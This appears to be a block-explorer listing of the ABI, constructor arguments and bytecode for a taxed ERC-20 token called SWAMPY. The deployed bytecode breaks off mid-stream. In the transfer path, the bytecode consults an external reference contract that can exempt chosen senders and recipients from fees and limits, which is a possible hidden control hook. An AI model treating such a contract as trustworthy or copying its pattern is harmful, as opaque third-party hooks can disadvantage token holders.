[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"supply_","type":"uint256"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"components":[{"internalType":"uint256","name":"centiBuyTax","type":"uint256"},{"internalType":"uint256","name":"centiSellTax","type":"uint256"},{"internalType":"address","name":"marketingWallet","type":"address"},{"internalType":"uint256","name":"maxTxPercent","type":"uint256"},{"internalType":"uint256","name":"maxWalletPercent","type":"uint256"}],"internalType":"struct SWAMPY.InitParams","name":"parameters","type":"tuple"},{"internalType":"address","name":"uniswapV2Router_","type":"address"},{"components":[{"internalType":"address","name":"ref_address","type":"address"},{"internalType":"address","name":"ref_dividend","type":"address"},{"internalType":"uint256","name":"ref_percent","type":"uint256"}],"internalType":"struct SWAMPY.Reference","name":"refInfo_","type":"tuple"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address[]","name":"accounts","type":"address[]"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedMultipleFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"LPPairUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxM","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isPair","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketing","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxM","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAt","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapRouter02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526040516200241a3803806200241a833981016040819052620000269162000998565b868685600362000037848262000b55565b50600462000046838262000b55565b506005805460ff191660ff929092169190911790555060009050620000683390565b60058054610100600160a81b0319166101006001600160a01b03841690810291909117909155604051919250906000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3508051601180546001600160a01b039283166001600160a01b031991821617909155602083015160128054919093169116179055604081015160138190556000906064906200010d903462000c37565b62000119919062000c51565b82516040519192506001600160a01b03169082156108fc029083906000818181858888f1935050505015801562000154573d6000803e3d6000fd5b50604080850151600b80546001600160a01b039283166001600160a01b0319918216179091558651600a55602080880151600955600e8a905560068054938816939092168317909155825163c45a015560e01b81529251919263c45a015592600482810193928290030181865afa158015620001d4573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001fa919062000c74565b6001600160a01b031663c9c6539630600660009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200025d573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000283919062000c74565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015620002d1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002f7919062000c74565b600780546001600160a01b0319166001600160a01b039290921691821790558251620003259160016200049a565b620003496200034160055461010090046001600160a01b031690565b6001620005a3565b600b5462000362906001600160a01b03166001620005a3565b815162000371906001620005a3565b602082015162000383906001620005a3565b62000390306001620005a3565b600654620003a9906001600160a01b03166001620005a3565b620003b685600a62000d8f565b620003c48761138862000664565b620003d190600162000da0565b620003dd919062000c37565b600855620003fb612710620003f487600a62000d8f565b9062000664565b8685606001516200040d919062000c37565b62000419919062000c37565b600c5562000430612710620003f487600a62000d8f565b86856080015162000442919062000c37565b6200044e919062000c37565b600d556200048c6200046d60055461010090046001600160a01b031690565b6200047a87600a62000d8f565b62000486908962000c37565b620006b7565b505050505050505062000deb565b6001600160a01b03821660009081526010602052604090205481151560ff909116151503620005365760405162461bcd60e51b815260206004820152603860248201527f4175746f6d61746564206d61726b6574206d616b65722070616972206973206160448201527f6c72656164792073657420746f20746861742076616c7565000000000000000060648201526084015b60405180910390fd5b6001600160a01b038281166000818152601060209081526040808320805460ff1916871515908117909155600183528184209589168452949091528082206000199055517f4bf69fee59f1751bf6064f46595c52d722796b529aca2b5a7b6d1ac6a8f8b0319190a3505050565b6005546001600160a01b03610100909104163314620006055760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016200052d565b6001600160a01b0382166000818152600f6020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6000620006ae83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506200079b60201b60201c565b90505b92915050565b6001600160a01b0382166200070f5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064016200052d565b6002546200071e9082620007dc565b6002556001600160a01b038216600090815260208190526040902054620007469082620007dc565b6001600160a01b038316600081815260208181526040808320949094559251848152919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b60008183620007bf5760405162461bcd60e51b81526004016200052d919062000db6565b506000620007ce848662000c51565b95945050505050565b505050565b600080620007eb838562000da0565b905083811015620006ae5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016200052d565b634e487b7160e01b600052604160045260246000fd5b60005b838110156200087257818101518382015260200162000858565b50506000910152565b600082601f8301126200088d57600080fd5b81516001600160401b0380821115620008aa57620008aa6200083f565b604051601f8301601f19908116603f01168101908282118183101715620008d557620008d56200083f565b81604052838152866020858801011115620008ef57600080fd5b6200090284602083016020890162000855565b9695505050505050565b80516001600160a01b03811681146200092457600080fd5b919050565b6000606082840312156200093c57600080fd5b604051606081016001600160401b03811182821017156200096157620009616200083f565b60405290508062000972836200090c565b815262000982602084016200090c565b6020820152604083015160408201525092915050565b60008060008060008060008789036101a0811215620009b657600080fd5b88516001600160401b0380821115620009ce57600080fd5b620009dc8c838d016200087b565b995060208b0151915080821115620009f357600080fd5b62000a018c838d016200087b565b985060408b0151975060608b0151915060ff8216821462000a2157600080fd5b81965060a0607f198401121562000a3757600080fd5b604051925060a083019150828210818311171562000a595762000a596200083f565b506040526080890151815260a0890151602082015262000a7c60c08a016200090c565b604082015260e089015160608201526101008901516080820152925062000aa761012089016200090c565b915062000ab9896101408a0162000929565b905092959891949750929550565b600181811c9082168062000adc57607f821691505b60208210810362000afd57634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620007d757600081815260208120601f850160051c8101602086101562000b2c5750805b601f850160051c820191505b8181101562000b4d5782815560010162000b38565b505050505050565b81516001600160401b0381111562000b715762000b716200083f565b62000b898162000b82845462000ac7565b8462000b03565b602080601f83116001811462000bc1576000841562000ba85750858301515b600019600386901b1c1916600185901b17855562000b4d565b600085815260208120601f198616915b8281101562000bf25788860151825594840194600190910190840162000bd1565b508582101562000c115787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620006b157620006b162000c21565b60008262000c6f57634e487b7160e01b600052601260045260246000fd5b500490565b60006020828403121562000c8757600080fd5b620006ae826200090c565b600181815b8085111562000cd357816000190482111562000cb75762000cb762000c21565b8085161562000cc557918102915b93841c939080029062000c97565b509250929050565b60008262000cec57506001620006b1565b8162000cfb57506000620006b1565b816001811462000d14576002811462000d1f5762000d3f565b6001915050620006b1565b60ff84111562000d335762000d3362000c21565b50506001821b620006b1565b5060208310610133831016604e8410600b841016171562000d64575081810a620006b1565b62000d70838362000c92565b806000190482111562000d875762000d8762000c21565b029392505050565b6000620006ae60ff84168362000cdb565b80820180821115620006b157620006b162000c21565b602081526000825180602084015262000dd781604085016020870162000855565b601f01601f19169190910160400192915050565b61161f8062000dfb6000396000f3fe60806040526004361061016a5760003560e01c806378d4e6d8116100d1578063a9059cbb1161008a578063d36e823911610064578063d36e82391461041c578063dd62ed3e14610432578063e5e31b1314610478578063f2fde38b146104a857600080fd5b8063a9059cbb146103c6578063c0246668146103e6578063c62921361461040657600080fd5b806378d4e6d81461032c5780638c0b5e22146103425780638da5cb5b14610358578063953635141461037b57806395d89b4114610391578063a457c2d7146103a657600080fd5b8063313ce56711610123578063313ce56714610268578063395093511461028a57806349bd5a5e146102aa57806370a08231146102ca578063715018a614610300578063751039fc1461031757600080fd5b806306fdde0314610176578063095ea7b3146101a15780631694505e146101d157806318160ddd1461020957806323b872dd146102285780632d3e474a1461024857600080fd5b3661017157005b600080fd5b34801561018257600080fd5b5061018b6104c8565b6040516101989190611279565b60405180910390f35b3480156101ad57600080fd5b506101c16101bc3660046112df565b61055a565b6040519015158152602001610198565b3480156101dd57600080fd5b506006546101f1906001600160a01b031681565b6040516001600160a01b039091168152602001610198565b34801561021557600080fd5b506002545b604051908152602001610198565b34801561023457600080fd5b506101c161024336600461130b565b610571565b34801561025457600080fd5b50600b546101f1906001600160a01b031681565b34801561027457600080fd5b5060055460405160ff9091168152602001610198565b34801561029657600080fd5b506101c16102a53660046112df565b6105da565b3480156102b657600080fd5b506007546101f1906001600160a01b031681565b3480156102d657600080fd5b5061021a6102e536600461134c565b6001600160a01b031660009081526020819052604090205490565b34801561030c57600080fd5b50610315610610565b005b34801561032357600080fd5b50610315610699565b34801561033857600080fd5b5061021a600a5481565b34801561034e57600080fd5b5061021a600c5481565b34801561036457600080fd5b5060055461010090046001600160a01b03166101f1565b34801561038757600080fd5b5061021a600d5481565b34801561039d57600080fd5b5061018b6106d7565b3480156103b257600080fd5b506101c16103c13660046112df565b6106e6565b3480156103d257600080fd5b506101c16103e13660046112df565b610735565b3480156103f257600080fd5b50610315610401366004611369565b610742565b34801561041257600080fd5b5061021a60095481565b34801561042857600080fd5b5061021a60085481565b34801561043e57600080fd5b5061021a61044d3660046113a7565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b34801561048457600080fd5b506101c161049336600461134c565b60106020526000908152604090205460ff1681565b3480156104b457600080fd5b506103156104c336600461134c565b6107d1565b6060600380546104d7906113d5565b80601f0160208091040260200160405190810160405280929190818152602001828054610503906113d5565b80156105505780601f1061052557610100808354040283529160200191610550565b820191906000526020600020905b81548152906001019060200180831161053357829003601f168201915b5050505050905090565b60006105673384846108cd565b5060015b92915050565b600061057e8484846109f2565b6105d084336105cb8560405180606001604052806028815260200161159d602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190610cb4565b6108cd565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916105679185906105cb9086610cee565b6005546001600160a01b036101009091041633146106495760405162461bcd60e51b81526004016106409061140f565b60405180910390fd5b60055460405160009161010090046001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a360058054610100600160a81b0319169055565b6005546001600160a01b036101009091041633146106c95760405162461bcd60e51b81526004016106409061140f565b600254600c55600254600d55565b6060600480546104d7906113d5565b600061056733846105cb856040518060600160405280602581526020016115c5602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190610cb4565b60006105673384846109f2565b6005546001600160a01b036101009091041633146107725760405162461bcd60e51b81526004016106409061140f565b6001600160a01b0382166000818152600f6020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6005546001600160a01b036101009091041633146108015760405162461bcd60e51b81526004016106409061140f565b6001600160a01b0381166108665760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610640565b6005546040516001600160a01b0380841692610100900416907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600580546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b6001600160a01b03831661092f5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610640565b6001600160a01b0382166109905760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610640565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0382161580610a1257506001600160a01b03821661dead145b80610a225750610a228383610d54565b80610a2b575080155b15610a4057610a3b838383610e1a565b505050565b600c54811115610aa35760405162461bcd60e51b815260206004820152602860248201527f5472616e7366657220616d6f756e74206578636565647320746865206d6178546044820152673c20b6b7bab73a1760c11b6064820152608401610640565b6007546001600160a01b03838116911614610b2e576001600160a01b038216600090815260208190526040902054600d54610ade838361145a565b1115610b2c5760405162461bcd60e51b815260206004820152601d60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e740000006044820152606401610640565b505b3060009081526020819052604090205460085481108015908190610b5c5750600754600160a01b900460ff16155b8015610b8157506001600160a01b03851660009081526010602052604090205460ff16155b15610bc6576007805460ff60a01b1916600160a01b179055818015610bb757600b54610bb79082906001600160a01b0316610f9d565b506007805460ff60a01b191690555b6007546001600160a01b0386166000908152600f602052604090205460ff600160a01b909204821615911680610c1457506001600160a01b0385166000908152600f602052604090205460ff165b15610c1d575060005b8015610ca1576000610c46612710610c40600a5488610ff390919063ffffffff16565b90611075565b6001600160a01b03871660009081526010602052604090205490915060ff1615610c8857610c85612710610c4060095488610ff390919063ffffffff16565b90505b610c9285826110b7565b9450610c9f873083610e1a565b505b610cac868686610e1a565b505050505050565b60008184841115610cd85760405162461bcd60e51b81526004016106409190611279565b506000610ce5848661146d565b95945050505050565b600080610cfb838561145a565b905083811015610d4d5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610640565b9392505050565b6001600160a01b0382166000908152600f602052604081205460ff1680610d9357506001600160a01b0382166000908152600f602052604090205460ff165b80610d4d575060125460405163cc5489df60e01b81526001600160a01b0385811660048301528481166024830152600092169063cc5489df906044016020604051808303816000875af1158015610dee573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e129190611480565b119392505050565b6001600160a01b038316610e7e5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610640565b6001600160a01b038216610ee05760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610640565b610f1d81604051806060016040528060268152602001611577602691396001600160a01b0386166000908152602081905260409020549190610cb4565b6001600160a01b038085166000908152602081905260408082209390935590841681522054610f4c9082610cee565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016109e5565b47610fa7836110f9565b6000610fb347836110b7565b6040519091506001600160a01b0384169082156108fc029083906000818181858888f19350505050158015610fec573d6000803e3d6000fd5b5050505050565b6000826000036110055750600061056b565b60006110118385611499565b90508261101e85836114b0565b14610d4d5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610640565b6000610d4d83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061124b565b6000610d4d83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610cb4565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061112e5761112e6114d2565b6001600160a01b03928316602091820292909201810191909152600654604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611187573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111ab91906114e8565b816001815181106111be576111be6114d2565b6001600160a01b0392831660209182029290920101526006546111e491309116846108cd565b60065460405163791ac94760e01b81526001600160a01b039091169063791ac9479061121d908590600090869030904290600401611505565b600060405180830381600087803b15801561123757600080fd5b505af1158015610cac573d6000803e3d6000fd5b6000818361126c5760405162461bcd60e51b81526004016106409190611279565b506000610ce584866114b0565b600060208083528351808285015260005b818110156112a65785810183015185820160400152820161128a565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146112dc57600080fd5b50565b600080604083850312156112f257600080fd5b82356112fd816112c7565b946020939093013593505050565b60008060006060848603121561132057600080fd5b833561132b816112c7565b9250602084013561133b816112c7565b929592945050506040919091013590565b60006020828403121561135e57600080fd5b8135610d4d816112c7565b6000806040838503121561137c57600080fd5b8235611387816112c7565b91506020830135801515811461139c57600080fd5b809150509250929050565b600080604083850312156113ba57600080fd5b82356113c5816112c7565b9150602083013561139c816112c7565b600181811c908216806113e957607f821691505b60208210810361140957634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b8082018082111561056b5761056b611444565b8181038181111561056b5761056b611444565b60006020828403121561149257600080fd5b5051919050565b808202811582820484141761056b5761056b611444565b6000826114cd57634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b6000602082840312156114fa57600080fd5b8151610d4d816112c7565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156115555784516001600160a01b031683529383019391830191600101611530565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212208607d642a88d6a2b9d31b4a0f4c3d2be59cd46cc02fca6335cc26b1c2101478364736f6c6343000813003300000000000000000000000000000000000000000000000000000000000001a000000000000000000000000000000000000000000000000000000000000001e0000000000000000000000000000000000000000000000000000000003b9aca00000000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000feecc2e045b57ff4d69b04837e2f8da41a06b33e000000000000000000000000000000000000000000000000000000000000032000000000000000000000000000000000000000000000000000000000000003200000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000214338920010bdf9d3e101987eb82742061ca89b000000000000000000000000e0a608d9f919ed38eb73dfbb9d891ebedb0f512a000000000000000000000000000000000000000000000000000000000000006400000000000000000000000000000000000000000000000000000000000000065357414d5059000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065357414d50590000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x60806040526004361061016a5760003560e01c806378d4e6d8116100d1578063a9059cbb1161008a578063d36e823911610064578063d36e82391461041c578063dd62ed3e14610432578063e5e31b1314610478578063f2fde38b146104a857600080fd5b8063a9059cbb146103c6578063c0246668146103e6578063c62921361461040657600080fd5b806378d4e6d81461032c5780638c0b5e22146103425780638da5cb5b14610358578063953635141461037b57806395d89b4114610391578063a457c2d7146103a657600080fd5b8063313ce56711610123578063313ce56714610268578063395093511461028a57806349bd5a5e146102aa57806370a08231146102ca578063715018a614610300578063751039fc1461031757600080fd5b806306fdde0314610176578063095ea7b3146101a15780631694505e146101d157806318160ddd1461020957806323b872dd146102285780632d3e474a1461024857600080fd5b3661017157005b600080fd5b34801561018257600080fd5b5061018b6104c8565b6040516101989190611279565b60405180910390f35b3480156101ad57600080fd5b506101c16101bc3660046112df565b61055a565b6040519015158152602001610198565b3480156101dd57600080fd5b506006546101f1906001600160a01b031681565b6040516001600160a01b039091168152602001610198565b34801561021557600080fd5b506002545b604051908152602001610198565b34801561023457600080fd5b506101c161024336600461130b565b610571565b34801561025457600080fd5b50600b546101f1906001600160a01b031681565b34801561027457600080fd5b5060055460405160ff9091168152602001610198565b34801561029657600080fd5b506101c16102a53660046112df565b6105da565b3480156102b657600080fd5b506007546101f1906001600160a01b031681565b3480156102d657600080fd5b5061021a6102e536600461134c565b6001600160a01b031660009081526020819052604090205490565b34801561030c57600080fd5b50610315610610565b005b34801561032357600080fd5b50610315610699565b34801561033857600080fd5b5061021a600a5481565b34801561034e57600080fd5b5061021a600c5481565b34801561036457600080fd5b5060055461010090046001600160a01b03166101f1565b34801561038757600080fd5b5061021a600d5481565b34801561039d57600080fd5b5061018b6106d7565b3480156103b257600080fd5b506101c16103c13660046112df565b6106e6565b3480156103d257600080fd5b506101c16103e13660046112df565b610735565b3480156103f257600080fd5b50610315610401366004611369565b610742565b34801561041257600080fd5b5061021a60095481565b34801561042857600080fd5b5061021a60085481565b34801561043e57600080fd5b5061021a61044d3660046113a7565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b34801561048457600080fd5b506101c161049336600461134c565b60106020526000908152604090205460ff1681565b3480156104b457600080fd5b506103156104c336600461134c565b6107d1565b6060600380546104d7906113d5565b80601f0160208091040260200160405190810160405280929190818152602001828054610503906113d5565b80156105505780601f1061052557610100808354040283529160200191610550565b820191906000526020600020905b81548152906001019060200180831161053357829003601f168201915b5050505050905090565b60006105673384846108cd565b5060015b92915050565b600061057e8484846109f2565b6105d084336105cb8560405180606001604052806028815260200161159d602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190610cb4565b6108cd565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916105679185906105cb9086610cee565b6005546001600160a01b036101009091041633146106495760405162461bcd60e51b81526004016106409061140f565b60405180910390fd5b60055460405160009161010090046001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a360058054610100600160a81b0319169055565b6005546001600160a01b036101009091041633146106c95760405162461bcd60e51b81526004016106409061140f565b600254600c55600254600d55565b6060600480546104d7906113d5565b600061056733846105cb856040518060600160405280602581526020016115c5602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190610cb4565b60006105673384846109f2565b6005546001600160a01b036101009091041633146107725760405162461bcd60e51b81526004016106409061140f565b6001600160a01b0382166000818152600f6020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6005546001600160a01b036101009091041633146108015760405162461bcd60e51b81526004016106409061140f565b6001600160a01b0381166108665760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610640565b6005546040516001600160a01b0380841692610100900416907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600580546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b6001600160a01b03831661092f5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610640565b6001600160a01b0382166109905760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610640565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0382161580610a1257506001600160a01b03821661dead145b80610a225750610a228383610d54565b80610a2b575080155b15610a4057610a3b838383610e1a565b505050565b600c54811115610aa35760405162461bcd60e51b815260206004820152602860248201527f5472616e7366657220616d6f756e74206578636565647320746865206d6178546044820152673c20b6b7bab73a1760c11b6064820152608401610640565b6007546001600160a01b03838116911614610b2e576001600160a01b038216600090815260208190526040902054600d54610ade838361145a565b1115610b2c5760405162461bcd60e51b815260206004820152601d60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e740000006044820152606401610640565b505b3060009081526020819052604090205460085481108015908190610b5c5750600754600160a01b900460ff16155b8015610b8157506001600160a01b03851660009081526010602052604090205460ff16155b15610bc6576007805460ff60a01b1916600160a01b179055818015610bb757600b54610bb79082906001600160a01b0316610f9d565b506007805460ff60a01b191690555b6007546001600160a01b0386166000908152600f602052604090205460ff600160a01b909204821615911680610c1457506001600160a01b0385166000908152600f602052604090205460ff165b15610c1d575060005b8015610ca1576000610c46612710610c40600a5488610ff390919063ffffffff16565b90611075565b6001600160a01b03871660009081526010602052604090205490915060ff1615610c8857610c85612710610c4060095488610ff390919063ffffffff16565b90505b610c9285826110b7565b9450610c9f873083610e1a565b505b610cac868686610e1a565b505050505050565b60008184841115610cd85760405162461bcd60e51b81526004016106409190611279565b506000610ce5848661146d565b95945050505050565b600080610cfb838561145a565b905083811015610d4d5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610640565b9392505050565b6001600160a01b0382166000908152600f602052604081205460ff1680610d9357506001600160a01b0382166000908152600f602052604090205460ff165b80610d4d575060125460405163cc5489df60e01b81526001600160a01b0385811660048301528481166024830152600092169063cc5489df906044016020604051808303816000875af1158015610dee573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e129190611480565b119392505050565b6001600160a01b038316610e7e5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610640565b6001600160a01b038216610ee05760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610640565b610f1d81604051806060016040528060268152602001611577602691396001600160a01b0386166000908152602081905260409020549190610cb4565b6001600160a01b038085166000908152602081905260408082209390935590841681522054610f4c9082610cee565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252a